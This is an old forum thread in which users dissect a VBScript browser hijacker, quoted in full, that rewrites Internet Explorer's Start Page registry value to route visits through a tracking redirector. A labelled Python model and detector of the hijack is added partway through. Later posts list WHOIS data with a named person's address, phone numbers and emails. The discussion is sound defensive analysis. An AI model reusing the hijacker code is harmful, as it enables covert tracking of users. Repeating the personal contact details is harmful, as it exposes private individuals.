
help with non virus thingy

  • 27-11-2001 3:21pm
    #1
    Closed Accounts Posts: 8,478 ✭✭✭


    OK, I was browsing the net when this happened:

    1) A download box opens.
    2) File name: THE-CID
    3) So I save it to disk [I know I shouldn't have, but it's been popping up before].
    4) I open the file with WordPad; the actual filename is now test.vbs [.vbs normally = VIRUS].
    5) This is what I saw:
    ' Swallow any runtime error (for example RegRead failing) and keep going
    on error resume next

    sub regcreate(regkey, regvalue)
        Set regedit = CreateObject("WScript.Shell")
        ' Values that are left alone: blank/local pages and the redirectors themselves
        Filter1 = "about:blank"
        Filter2 = "file:"
        Filter3 = "C:"
        Filter4 = "http://www.startyourdayhere.com"
        Filter5 = "http://redirect.linksummary.com"
        ' Current value of the registry key (the existing Start Page)
        OUD = regedit.RegRead(regkey)
        URL = "http://str.realredirect.com/default.asp?a="
        ' Only rewrite when the current value starts with none of the above prefixes
        if Left(OUD, Len(URL)) <> URL AND Left(OUD, Len(Filter1)) <> Filter1 AND Left(OUD, Len(Filter3)) <> Filter3 AND Left(OUD, Len(Filter2)) <> Filter2 AND Left(OUD, Len(Filter4)) <> Filter4 AND Left(OUD, Len(Filter5)) <> Filter5 then
            ' New value = redirector prefix followed by the old Start Page
            regedit.RegWrite regkey, regvalue + OUD
        end if
    end sub


    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://redirect.linksummary.com/redirect.asp?a="

    Obviously it changes the start page of Explorer to whatever. I sent an email to the admin of linksummary complaining about it. My question is: how is it tagged onto a site, and how did it initiate?

    Anybody else get this?


Comments

  • Registered Users Posts: 68,317 ✭✭✭✭seamus


    OK, I've never done VB, but no doubt '.vbs' stands for Visual Basic Script. It looks like it's trying to log a permanent redirect if that page comes up with errors, but not knowing VB I couldn't know. Maybe the website people themselves put it there :)


  • Registered Users Posts: 2,494 ✭✭✭kayos


    Right, so from my quick reading of this script, what's happening is as follows.

    Step 1:
    Something calls this function, passing it a regkey and a value for that regkey:
    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://redirect.linksummary.com/redirect.asp?a="

    being what calls it.

    Step 2:
    The function reads your current value for the regkey into the var OUD.

    Step 3:
    It compares the var OUD to the var URL. If OUD is different from any of the following, URL, Filter1, Filter2, Filter3, Filter4 or Filter5, it writes the following string to your reg:
    http://redirect.linksummary.com/redirect.asp?a=<whatever your default home page is>

    So if your home page was http://www.boards.ie it would write
    http://redirect.linksummary.com/redirect.asp?a=http://www.boards.ie
    

    What site did this script come from? I'll see whats happening when you post the site up.

    kayos


  • Registered Users Posts: 21,264 ✭✭✭✭Hobbes


    Originally posted by Gone Shootin
    Obviously it changes the start page of Explorer to whatever.

    Actually it's a little nastier than that. It causes your page requests to be routed through their server, so if you were to look at http://www.boards.ie/ instead you would get http://redirect.linksummary.com/redirect.asp?a=http://www.boards.ie/

    So everything would be cached on their server. Not sure if it would grab passwords or whatnot, but it would give them a list of pages you access.

    Something like this would probably be used to slap an advert or two at you, but I just checked the link and it just serves up the page, so my guess is they are using it to track and store information on you. *sigh* Better change my password =/

    That code looks very buggy though.
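Added example, not code from the thread or from any of its posters: a Python model of the three steps kayos walks through and of Hobbes's point that the rewritten value routes every start-page load through the redirector, together with the check a practitioner would want, namely recognising a hijacked Start Page value and recovering the real home page from it. The prefix strings are copied from the posted script; the function names, the sample home page and the optional winreg read of the live key are assumptions made here.

```python
"""Model of the Start Page hijack posted above, plus a check that detects and undoes it.

Added example, not code from the thread. The prefix strings are copied from the
posted script; the function names and sample values are made up here.
"""
import sys

# Value the posted script prepends to the existing Start Page (its regvalue argument).
HIJACK_PREFIX = "http://redirect.linksummary.com/redirect.asp?a="

# Prefixes the posted script refuses to touch: its URL and Filter1..Filter5 variables.
# Blank/local pages are skipped, and so is anything already going through a redirector.
SKIP_PREFIXES = (
    "http://str.realredirect.com/default.asp?a=",   # URL
    "about:blank",                                  # Filter1
    "file:",                                        # Filter2
    "C:",                                           # Filter3
    "http://www.startyourdayhere.com",              # Filter4
    "http://redirect.linksummary.com",              # Filter5
)

# Redirector prefixes a hijacked value can start with; the text after "?a=" is the real page.
REDIRECTOR_PREFIXES = (
    HIJACK_PREFIX,
    "http://str.realredirect.com/default.asp?a=",
)


def hijack(start_page: str) -> str:
    """What regcreate does to the Start Page value (kayos's steps 2 and 3).

    Mirrors the script's Left(OUD, Len(x)) <> x tests, which are case-sensitive
    prefix checks, so a lowercase 'c:\\home.htm' is not protected by the 'C:' filter.
    """
    if any(start_page.startswith(p) for p in SKIP_PREFIXES):
        return start_page                      # the script's 'if' fails: no RegWrite
    return HIJACK_PREFIX + start_page          # regvalue + OUD, old value appended raw


def is_hijacked(start_page: str) -> bool:
    """True when the value routes the start-page load through a redirector."""
    return start_page.startswith(REDIRECTOR_PREFIXES)


def original_page(start_page: str) -> str:
    """Recover the user's real home page from a hijacked value.

    The script concatenates the old value without URL-encoding it, so the text
    after '?a=' is taken verbatim rather than parsed as a query string (a home
    page that itself contains '&' would otherwise be split apart).
    """
    for prefix in REDIRECTOR_PREFIXES:
        if start_page.startswith(prefix):
            return start_page[len(prefix):]
    return start_page


def read_start_page():
    """Read HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page; None off Windows."""
    if sys.platform != "win32":
        return None
    import winreg  # standard library, Windows only
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER,
                        r"Software\Microsoft\Internet Explorer\Main") as key:
        value, _type = winreg.QueryValueEx(key, "Start Page")
    return value


if __name__ == "__main__":
    # Constructed sample: the boards.ie case kayos walks through.
    before = "http://www.boards.ie"
    after = hijack(before)
    print("after hijack:  ", after)
    print("second run same:", hijack(after) == after)   # Filter5 stops a second prepend
    print("recovered:     ", original_page(after))

    current = read_start_page()
    if current is not None:
        print("this machine:", "HIJACKED" if is_hijacked(current) else "clean", current)
```

On a Windows box the last lines read the live key and report it; elsewhere the script only runs the constructed sample. The skip list is why running the script twice does not nest two redirectors, and why a machine whose home page is about:blank or a local file shows no symptom at all.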


  • Closed Accounts Posts: 285 ✭✭marauder


    That explains the name...

    Records of the Office of War Information
    The Central Intelligence Division, among its other functions, was to maintain a central repository of intelligence material and a central repository for all foreign operational information in Washington


  • Closed Accounts Posts: 8,478 ✭✭✭GoneShootin


    Now this I don't understand. I checked my homepage, the one I actually made [and am still making]:

    http://www.mitchelstown.net

    Checked it today and got the download window with THE-CID.

    Check it out, but don't open it ;)


    I presume I'm gonna have to wipe the server or something, or maybe it's coming through the domain service:

    http://www.namesecure.com

    Here is the reply to the email I sent to the linksummary admin:

    "Dear Mr Rea, this sounds very serious, please give us the URL that you found this file at" etc....


  • Registered Users Posts: 21,264 ✭✭✭✭Hobbes


    Registrant:
    Ismailova, Elmira (LINKSUMMARY-DOM)
    Distelvlinderweg 88
    Diemen, - 1113 LB
    NL

    Domain Name: LINKSUMMARY.COM

    Administrative Contact, Technical Contact, Billing Contact:
    Ismailova, Elmira (RWHDCPZTCI) elmira@elmira-fashion.com
    Distelvlinderweg 88
    Diemen, - 1113 LB
    NL
    +31 6 53216321 +31 20 5241313

    That is in Holland btw.

    Now either the admin of linksummary is in on it, or their server is hacked.

    Elmira also runs (or is part of) realtracker.com, which is a homepage usage tracker.

    She can also be contacted at a.de.raaf@universal.nl, which appears to be an address also used by a "Gert-Jan Strik", who appears among other things to be a VB expert.

    Realtracker.com have been known to spam people and newsgroups. Their sites are clickthrough links which give the guy cash when people click the link.

    Owners of realtracker.com other contact information...

    john@pagetostart.com
    beheer@cybercomm.nl
    postmaster@pagetostart.nl
    postmaster@worldtostart.com
    adult_beheer@hotmail.com
    arjan@PAGETOSTART.COM (owner)
    postmaster@mediahighway.nl (owner)
    arjan@realtracker.com (owner)
    beheer@pins.nl

    I have found more information but from a guess of what I have read so far they are spammers, lord knows what they are up to with that file though.


  • Registered Users Posts: 16,413 ✭✭✭✭Trojan


    Hey Hobbes, check your PM.

    Al.


  • Closed Accounts Posts: 8,478 ✭✭✭GoneShootin


    And of course I use realtracker for ALL of my sites. God dammit, I don't feel like going through them and deleting them off the pages, especially with some of the sites having LOADSA hits...

    Thanks Hobbes


  • Closed Accounts Posts: 8,478 ✭✭✭GoneShootin


    Update....

    This is what I got in my email this morning:
    I did check your website and I didn't get what you did get but I do know
    that one of our ex-workers did damage a few of our systems after we fired
    him, could you please check if you still got the problem described below?

    Arjan de Raaf
    LinkSummary

    Now the file is actually gone, which is fine, but I suspect that it was there when he took a look at it and THEN he fixed it....

    lol, AFTER WE FIRED HIM, funny....

